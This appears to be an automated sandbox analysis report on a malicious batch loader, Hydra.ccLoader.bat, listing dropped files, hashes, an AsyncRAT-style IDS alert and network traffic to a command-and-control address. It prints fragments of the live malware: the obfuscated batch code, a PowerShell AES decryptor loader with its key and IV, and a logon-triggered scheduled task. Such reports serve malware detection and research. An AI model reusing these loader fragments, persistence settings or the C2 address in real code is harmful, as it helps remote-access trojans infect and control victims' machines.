                                        Preview:MSCF....t.......,...................I........E.........J.R .pinrules.stl..>N.#..ECK.[.T...O......l.$.)V.a...v.d.H...&.D.YA,(+Y...A.......c]."ka-.XW..I.....w..|..9.........{...|d..v.T..w.TMZ.|...).F.rtAm.....f......T.*.......n.z.:.t&.} EH.S.)2...SP.../~.Q..d..".@.5..r(..M.Zs..~{...>...p.p.^....[/p..~.....@......f..E0....9.i...Ds..^.d...N.R@..P%..9... .4Z)...z..h...@.......C<.]6....([.c=.9..l.....@..4......f.......z.!..0.`Jp.."$I..?`......H...].2...$....9v1./g.&.aIX.A..A.w*..p.*.`r.........'!e.. ..d...H.d.hu`.\!w.Z..E.$....$..|1..@.OC!c.......%.....p.uxC.~@....`...#.~ .P.!.Gb`)i...L..0.-.K.....xRx.e"..@.....5T..JP^.9.....#aH.E.@2..H..f.H..K...+x..$.WM..H}....=....`.PD:.qgn........I.....]uX..q...D...]n.4..0..b!.....m"a.Lz...d..S%P.I11,..^..".+At..To\@K.....c.h.C.....=...H.Xa...r.A.I..@!..0..eV...|.h..$."r..hL9TR..}.v%...4).H..[.....r..|]..+5..Y..I..hN...O=u..8.}U...#S...R..KQ..A..w....X|.....8b...GC.4..h....6gG.>..}.8....!ql..A..1..X.C.q.j....
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):328
                                        Entropy (8bit):3.144086598890895
                                        Encrypted:false
                                        SSDEEP:6:kK5hL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:KDnLNkPlE99SNxAhUe/3
                                        MD5:BD67A333FF2ACAAB6478418CB3C66A23
                                        SHA1:F3C09033F33C6E9C58463C6C1B786CA7E38F0AA6
                                        SHA-256:8E8FCD09240B9F47397F61A09DA81B813873EFE18CD8C62CF2AA6E3777B5E69B
                                        SHA-512:90165037BD9D969B2D89583B9D6663F579283E96E2DBD5787970474665FBA233280F274A4D63FAF42440344AF4C9452F579242D7C181B8114F1E20597B142C70
                                        Malicious:false
                                        Preview:p...... ........vH...L..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):330
                                        Entropy (8bit):3.2270092039349865
                                        Encrypted:false
                                        SSDEEP:6:kKpiWK81wJwcN+SkQlPlEGYRMY9z+4D1QuflIeyGIla1:0N0njkPlE99Si1QyIeek
                                        MD5:1825FC0C60AAED920A5A20DD766067D6
                                        SHA1:F259A920E9C686DB787A9C1F7673AF93EF804467
                                        SHA-256:E434CA40A6E51CEDB6A66C228E027BAA30283955F1523FA2FF31607DF80D3751
                                        SHA-512:215D540D338E6ADD75AC36A3DB25437F6A54C556B737C2492A12D4993FDEA2C8E1D7737DC2F3768B10F8CD3C8108EC95F5C432AF35E10D8C814D23D4D1EB441D
                                        Malicious:false
                                        Preview:p...... .........k@..L..(....................................................... ........B@!........(...........t...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.p.i.n.r.u.l.e.s.s.t.l...c.a.b...".8.0.4.2.4.0.2.1.c.7.d.b.d.2.1.:.0."...
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):11887
                                        Entropy (8bit):4.902223164394918
                                        Encrypted:false
                                        SSDEEP:192:69smzdcU6Cj9dcU6C7Vsm5emdRYG9smbib4xYTVsm5emdqxoe5gpOWib4g2Ca6pM:8FFYIib4xYTfHib4nopbjvwRjdvRIikK
                                        MD5:39211000344E9937CA021DE6FC4B9EC7
                                        SHA1:A4D6DD72F2A2F8D4A481193C100EF438891892DA
                                        SHA-256:C7E8DA2731FB1F2529C6B42C15A46FC34C935C8C8F1ECC3D1E248CB02AD94ADD
                                        SHA-512:48615A78F58276706F66095DAB2971A22F7543CA952A7615F03D46C9CAC02813ADFEB6392B3742561BC40588BEB4FD5E76375366B7BA9B125E6B823CCBA37C91
                                        Malicious:false
                                        Preview:PSMODULECACHE......&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-Z..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package........Find-Package........Install-PackageProvider........Import-PackageProvider........Get-PackageProvider........Register-PackageSource........Uninstall-Package........Find-PackageProvider........p...z..[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):2892
                                        Entropy (8bit):5.437969087793142
                                        Encrypted:false
                                        SSDEEP:48:oizsSU4y4RQmFoUL5a+m9qr9t5/78NWR8lgxJZKaVEouYAgwd64rHLjtvk:oizlHyIFKEg9qrh7KWBJ5Eo9Adrxk
                                        MD5:F187E059B6AB94D3F218253CA180C199
                                        SHA1:20203FAC2034CC4A6F3E0119DC02B9CACEF2973C
                                        SHA-256:238A0A4F0560A22C11544F0312F7EB787D4B5C60994C6B0904487045CB410AA0
                                        SHA-512:5BFC8D7159ADC154ECDBC2B8EC716277FEA72E1573C362BF84208AC36056E1FC864636C882C3C272AF9C5F9F7B1E1E56D1DB671A7B01A490040E652850331B0F
                                        Malicious:false
                                        Preview:@...e...........................................................H..............@-....f.J.|.7h8..+.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...|...........System.Configuration4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:DOS batch file, ASCII text, with very long lines (3435), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):7306960
                                        Entropy (8bit):6.017027296439472
                                        Encrypted:false
                                        SSDEEP:49152:IZLQemZkP6CTsEjDRD4rpr9ksVdoUrE3KobuHAhtguS37adZO2UaSl5UDLL73Hcx:T
                                        MD5:98347650099E648660CEC15B17DBD5C0
                                        SHA1:C3162C64614F82D20587A1C0A2753C8B616884B7
                                        SHA-256:39FA01D351C5CDB6DE9C4155F0C7D4241578EA02E5FC735C19FAAE312487DC20
                                        SHA-512:2B0B853FE69E5F21C1ABAAF2CDA5716B39C72172A59C201BB16D96A2779D169AC07FC8300FE5271C27C982DFFA58EF4955CBF0E4489BA063EEC1F1190A9D11C0
                                        Malicious:false
                                        Preview:@echo off..%SNuMgUtlQoVeJvaiaAkZVsBJfeOvYBfRpBVQcYcQ%@%gldnQLrHniuoDHAmLGcgYmoieOizjfcxurPgxwoswOKsLD%%UvErraKJTWVicDRxigXTlRtOpsJJkBWxAcneFOKwKHWjCnmPFq%e%lOJAcbPcZrbzrayIZpNStwAjDVkmbfTeTZKIQClc%%MKfJiEieEnARyiPnAWgRDaUyWFsqPRxdKbHMvAvrbhxSsmvQUvqFel%c%MQHMCmRpNQxhwBdSaAPPvDb%%KjBvtBRYyOVVONS%h%jSKcVeZpRDpepwR%%OBbtKvVlYyJHFhdmILF%o%TZjFkmEQmMJbWMgmMzuNWydxvrJJzcwDQopPsviy%%fZmOHLSaRAiqRGuWMkTCUrjpfkHwrTqrVWRzQIOGRIHConYIVTGlpWWO% %XIwdwJXkQuVPUfdvmLlJHaSmZAynebZZcJTZsCuZJrxSdTaNCPckKf%%WQkeVkKfOuWMllddJqm%o%pCaigAKLoZPoXAXjhyzPZmJxggPCyMsUyfTtQbYvzZRPFIOKoUWlRxZdTCcZKimC%%UPSHDsgAepauTRyrfnEQhdbfQAnZYKrMoiLSWcLBPKNh%f%IZLDHEUIMzROMQcfgCtYnfLgGucCcawpTghACvqfweCITejlIwIitjLCoEXnBsGM%%BUGICCLlnCjDd%f%BlRTFroWJuFmXydDdyQFrjD%..%gUXWgHCZlsvcKyauNFlmdpFmiJyKMxUsIoNLtsPc%s%FaFdbTFxvRMYqzQoLOwjRmNxcuwKpbvPitypZjgQSnrFiurOXwHEsSbs%%haHwUiuwWPWbBpCHGqDVipI%e%INTtRwpsfcSi%%uYeWjlEuNvhfWMCxweSsEOgpaFAzEVzwuims%t%YYddIUrLnUKNVIXZQUFRPWEKfQSWKLOAjYyg%%oWTODMKQLImCwDoGBJctsYRcvbCfkEXkQlBXLcmjTUth
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):36864
                                        Entropy (8bit):4.3900594222407125
                                        Encrypted:false
                                        SSDEEP:384:VZCSSrPcfu1FIyBl3pdSRf+yTq5+9f2sMbRAxzQ1yTkepoeL80bk20OzSIS+gL0i:VZArPDDIulZdSRWfY9f/hngDU2/t7
                                        MD5:B943A57BDF1BBD9C33AB0D33FF885983
                                        SHA1:1CEE65EEA1AB27EAE9108C081E18A50678BD5CDC
                                        SHA-256:878DF6F755578E2E79D0E6FD350F5B4430E0E42BB4BC8757AFB97999BC405BA4
                                        SHA-512:CB7253DE88BD351F8BCB5DC0B5760D3D2875D39F601396A4250E06EAD9E7EDEFFCD94FA23F392833F450C983A246952F2BAD3A40F84AFF2ADC0F7D0EB408D03C
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 5%
                                        Joe Sandbox View:
                                        • Filename: NhoqAfkhHL.bat, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...GB..........."...0.................. ....@...... ....................................`...@......@............... ............................................................................................................................... ..H............text........ ...................... ..`.rsrc...............................@..@........................................H......................................................................ga..G.*.I..6..+......6.2..5.tK@.g1.9.....Q...@a..W1...}.... .d......</.X....m..Zg.."."^.F..0......G.c.....(D..(....G...u.KM...........D.|/..J3....?.vMl.-.P...)...RZ..-....|.0.x.....D.....>...G...C..e.....IZem...s....|.l~.c........<d.*..y.W..E..2.&c\z..Z.......................................................................................%%........;m2....2m;............................................
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:DOS batch file, ASCII text, with very long lines (3435), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):7306960
                                        Entropy (8bit):6.017027296439472
                                        Encrypted:false
                                        SSDEEP:49152:IZLQemZkP6CTsEjDRD4rpr9ksVdoUrE3KobuHAhtguS37adZO2UaSl5UDLL73Hcx:T
                                        MD5:98347650099E648660CEC15B17DBD5C0
                                        SHA1:C3162C64614F82D20587A1C0A2753C8B616884B7
                                        SHA-256:39FA01D351C5CDB6DE9C4155F0C7D4241578EA02E5FC735C19FAAE312487DC20
                                        SHA-512:2B0B853FE69E5F21C1ABAAF2CDA5716B39C72172A59C201BB16D96A2779D169AC07FC8300FE5271C27C982DFFA58EF4955CBF0E4489BA063EEC1F1190A9D11C0
                                        Malicious:true
                                        Preview:@echo off..%SNuMgUtlQoVeJvaiaAkZVsBJfeOvYBfRpBVQcYcQ%@%gldnQLrHniuoDHAmLGcgYmoieOizjfcxurPgxwoswOKsLD%%UvErraKJTWVicDRxigXTlRtOpsJJkBWxAcneFOKwKHWjCnmPFq%e%lOJAcbPcZrbzrayIZpNStwAjDVkmbfTeTZKIQClc%%MKfJiEieEnARyiPnAWgRDaUyWFsqPRxdKbHMvAvrbhxSsmvQUvqFel%c%MQHMCmRpNQxhwBdSaAPPvDb%%KjBvtBRYyOVVONS%h%jSKcVeZpRDpepwR%%OBbtKvVlYyJHFhdmILF%o%TZjFkmEQmMJbWMgmMzuNWydxvrJJzcwDQopPsviy%%fZmOHLSaRAiqRGuWMkTCUrjpfkHwrTqrVWRzQIOGRIHConYIVTGlpWWO% %XIwdwJXkQuVPUfdvmLlJHaSmZAynebZZcJTZsCuZJrxSdTaNCPckKf%%WQkeVkKfOuWMllddJqm%o%pCaigAKLoZPoXAXjhyzPZmJxggPCyMsUyfTtQbYvzZRPFIOKoUWlRxZdTCcZKimC%%UPSHDsgAepauTRyrfnEQhdbfQAnZYKrMoiLSWcLBPKNh%f%IZLDHEUIMzROMQcfgCtYnfLgGucCcawpTghACvqfweCITejlIwIitjLCoEXnBsGM%%BUGICCLlnCjDd%f%BlRTFroWJuFmXydDdyQFrjD%..%gUXWgHCZlsvcKyauNFlmdpFmiJyKMxUsIoNLtsPc%s%FaFdbTFxvRMYqzQoLOwjRmNxcuwKpbvPitypZjgQSnrFiurOXwHEsSbs%%haHwUiuwWPWbBpCHGqDVipI%e%INTtRwpsfcSi%%uYeWjlEuNvhfWMCxweSsEOgpaFAzEVzwuims%t%YYddIUrLnUKNVIXZQUFRPWEKfQSWKLOAjYyg%%oWTODMKQLImCwDoGBJctsYRcvbCfkEXkQlBXLcmjTUth
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):3492
                                        Entropy (8bit):3.5802182119839494
                                        Encrypted:false
                                        SSDEEP:96:tpSPnkp2Gdi3ipVA9ll7EhAMz3cHtgjy++:mfkYx39OhO6jy++
                                        MD5:AF410BE474489E89C5CF59E274206258
                                        SHA1:EADE9BF20440B22DC0D74ACA03F8F2A7FEF120B3
                                        SHA-256:67285EF8977C90BF2C3B48C935AC0F8F574203D743128A31B135187E5C7BAB5F
                                        SHA-512:0DBB0165F2E66D3B42CCA682A69327B4F11D5E1BBEF91AD752D7F558E1E6FF6970C080A2359ACA4E92760A085C32EADA4C73A7280757B7CCAE5F081E1A6A834B
                                        Malicious:false
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.2.-.1.2.T.1.2.:.0.6.:.5.3...3.2.-.0.5.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.n.y.a.-.i.M.0.v.f.Z.c.H.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... . .
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):338
                                        Entropy (8bit):3.9376330439929346
                                        Encrypted:false
                                        SSDEEP:6:kKZHxGEeBfxJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:Rxr0CkPlE99SCQl2DUevat
                                        MD5:DC520E1DB327987D68DA7AAA57D0D967
                                        SHA1:1B02D673BB275B841BA8F4C636A21EB4332F62C2
                                        SHA-256:8E3C387D6A22DA73618B9B5E1776A3383FD44E1DDB5853C0CF133AED67979E6B
                                        SHA-512:0513D9808E7B728B3BF5FA900F4B1A7412BD3BEB99361F07F3DF8D21A4B2B8A4D8EE9F07E4864824638850796E08939436B7F763268A7356F01550D6198F6A98
                                        Malicious:false
                                        Preview:p...... ............Z...(................p...L.....=M... a.,M.............=M.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (2196), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2386
                                        Entropy (8bit):5.723782857064336
                                        Encrypted:false
                                        SSDEEP:48:9JFHDR56QRTRLRx/B3qBB3p8Nv9PAobNPv4pXyB1N6r9FKo2Ukm2Uxr2UGd:PFHDR5F5d7/BaBB58nAP+uFKo2Dm2iru
                                        MD5:F4227726EDE41C6CAAF6F582E15432E8
                                        SHA1:9EC3FEFFC42D578E1C0C37DC256F94C0FB05B65F
                                        SHA-256:C1D4579EE2DAF54B4F98B2D68C0C784AA00458B4497B990A68A11A6ED078FB3B
                                        SHA-512:A4EC7E69C78208ED160F1AA9D92E453FB5E1766B9CBA83C6DF99B4D838F9725AE019DF1883BFCDE366951381AE7E08C0C4971CCE1AC25E5C84B5396C1BC66FA4
                                        Malicious:false
                                        Preview:Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function LaqSe($iUuMH){.$vwFBp=[System.Security.Cryptography.Aes]::Create();.$vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs=');.$vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ==');.$mWNkD=$vwFBp.CreateDecryptor();.$FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length);.$mWNkD.Dispose();.$vwFBp.Dispose();.$FMJVb;}function ODxLi($iUuMH){.Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', '');.Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', '');.Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*S
                                        File type:DOS batch file, ASCII text, with very long lines (3435), with CRLF line terminators
                                        Entropy (8bit):6.017027296439472
                                        TrID:
                                          File name:Hydra.ccLoader.bat
                                          File size:7'306'960 bytes
                                          MD5:98347650099e648660cec15b17dbd5c0
                                          SHA1:c3162c64614f82d20587a1c0a2753c8b616884b7
                                          SHA256:39fa01d351c5cdb6de9c4155f0c7d4241578ea02e5fc735c19faae312487dc20
                                          SHA512:2b0b853fe69e5f21c1abaaf2cda5716b39c72172a59c201bb16d96a2779d169ac07fc8300fe5271c27c982dffa58ef4955cbf0e4489ba063eec1f1190a9d11c0
                                          SSDEEP:49152:IZLQemZkP6CTsEjDRD4rpr9ksVdoUrE3KobuHAhtguS37adZO2UaSl5UDLL73Hcx:T
                                          TLSH:0B7633712B841FAB0D5C812DA0DB7E3E01C51F65A91FD0E3C5B63682075DB976B3AC2A
                                          File Content Preview:@echo off..%SNuMgUtlQoVeJvaiaAkZVsBJfeOvYBfRpBVQcYcQ%@%gldnQLrHniuoDHAmLGcgYmoieOizjfcxurPgxwoswOKsLD%%UvErraKJTWVicDRxigXTlRtOpsJJkBWxAcneFOKwKHWjCnmPFq%e%lOJAcbPcZrbzrayIZpNStwAjDVkmbfTeTZKIQClc%%MKfJiEieEnARyiPnAWgRDaUyWFsqPRxdKbHMvAvrbhxSsmvQUvqFel%c%
                                          Icon Hash:9686878b929a9886
                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-12-12T18:02:48.092535+01002035595ET MALWARE Generic AsyncRAT Style SSL Cert1135.125.21.874782192.168.2.749816TCP
                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 12, 2024 18:02:46.513772964 CET498164782192.168.2.7135.125.21.87
                                          Dec 12, 2024 18:02:46.646873951 CET478249816135.125.21.87192.168.2.7
                                          Dec 12, 2024 18:02:46.646956921 CET498164782192.168.2.7135.125.21.87
                                          Dec 12, 2024 18:02:46.659722090 CET498164782192.168.2.7135.125.21.87
                                          Dec 12, 2024 18:02:46.782330990 CET478249816135.125.21.87192.168.2.7
                                          Dec 12, 2024 18:02:47.929055929 CET478249816135.125.21.87192.168.2.7
                                          Dec 12, 2024 18:02:47.929208994 CET478249816135.125.21.87192.168.2.7
                                          Dec 12, 2024 18:02:47.929301023 CET498164782192.168.2.7135.125.21.87
                                          Dec 12, 2024 18:02:47.965987921 CET498164782192.168.2.7135.125.21.87
                                          Dec 12, 2024 18:02:48.092535019 CET478249816135.125.21.87192.168.2.7
                                          Dec 12, 2024 18:02:48.366986036 CET478249816135.125.21.87192.168.2.7
                                          Dec 12, 2024 18:02:48.413109064 CET498164782192.168.2.7135.125.21.87
                                          Dec 12, 2024 18:02:50.813021898 CET49828443192.168.2.7108.181.61.49
                                          Dec 12, 2024 18:02:50.813065052 CET44349828108.181.61.49192.168.2.7
                                          Dec 12, 2024 18:02:50.813136101 CET49828443192.168.2.7108.181.61.49
                                          Dec 12, 2024 18:02:50.814677954 CET49828443192.168.2.7108.181.61.49
                                          Dec 12, 2024 18:02:50.814696074 CET44349828108.181.61.49192.168.2.7
                                          Dec 12, 2024 18:02:53.244695902 CET44349828108.181.61.49192.168.2.7
                                          Dec 12, 2024 18:02:53.244771957 CET49828443192.168.2.7108.181.61.49
                                          Dec 12, 2024 18:02:53.287322044 CET49828443192.168.2.7108.181.61.49
                                          Dec 12, 2024 18:02:53.287353039 CET44349828108.181.61.49192.168.2.7
                                          Dec 12, 2024 18:02:53.287705898 CET44349828108.181.61.49192.168.2.7
                                          Dec 12, 2024 18:02:53.299336910 CET49828443192.168.2.7108.181.61.49
                                          Dec 12, 2024 18:02:53.343327045 CET44349828108.181.61.49192.168.2.7
                                          Dec 12, 2024 18:02:53.912750006 CET44349828108.181.61.49192.168.2.7
                                          Dec 12, 2024 18:02:53.912933111 CET44349828108.181.61.49192.168.2.7
                                          Dec 12, 2024 18:02:53.913099051 CET49828443192.168.2.7108.181.61.49
                                          Dec 12, 2024 18:02:53.982429028 CET49828443192.168.2.7108.181.61.49
                                          Dec 12, 2024 18:02:54.302625895 CET498164782192.168.2.7135.125.21.87
                                          Dec 12, 2024 18:02:54.422501087 CET478249816135.125.21.87192.168.2.7
                                          Dec 12, 2024 18:02:54.422600985 CET498164782192.168.2.7135.125.21.87
                                          Dec 12, 2024 18:02:54.544394970 CET478249816135.125.21.87192.168.2.7
                                          Dec 12, 2024 18:02:54.831592083 CET478249816135.125.21.87192.168.2.7
                                          Dec 12, 2024 18:02:54.881907940 CET498164782192.168.2.7135.125.21.87
                                          Dec 12, 2024 18:02:55.023600101 CET478249816135.125.21.87192.168.2.7
                                          Dec 12, 2024 18:02:55.063546896 CET498164782192.168.2.7135.125.21.87
                                          Dec 12, 2024 18:02:55.183280945 CET478249816135.125.21.87192.168.2.7
                                          Dec 12, 2024 18:02:55.183448076 CET498164782192.168.2.7135.125.21.87
                                          Dec 12, 2024 18:02:55.303231001 CET478249816135.125.21.87192.168.2.7
                                          Dec 12, 2024 18:03:02.476905107 CET498164782192.168.2.7135.125.21.87
                                          Dec 12, 2024 18:03:02.597152948 CET478249816135.125.21.87192.168.2.7
                                          Dec 12, 2024 18:03:02.597218990 CET498164782192.168.2.7135.125.21.87
                                          Dec 12, 2024 18:03:02.717009068 CET478249816135.125.21.87192.168.2.7
                                          Dec 12, 2024 18:03:27.741539001 CET498164782192.168.2.7135.125.21.87
                                          Dec 12, 2024 18:03:27.902817011 CET478249816135.125.21.87192.168.2.7
                                          Dec 12, 2024 18:03:52.944834948 CET498164782192.168.2.7135.125.21.87
                                          Dec 12, 2024 18:03:53.064934969 CET478249816135.125.21.87192.168.2.7
                                          Dec 12, 2024 18:04:18.070116997 CET498164782192.168.2.7135.125.21.87
                                          Dec 12, 2024 18:04:18.189883947 CET478249816135.125.21.87192.168.2.7
                                          Dec 12, 2024 18:04:43.195179939 CET498164782192.168.2.7135.125.21.87
                                          Dec 12, 2024 18:04:43.314950943 CET478249816135.125.21.87192.168.2.7
                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 12, 2024 18:02:50.669286966 CET6274953192.168.2.71.1.1.1
                                          Dec 12, 2024 18:02:50.809104919 CET53627491.1.1.1192.168.2.7
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
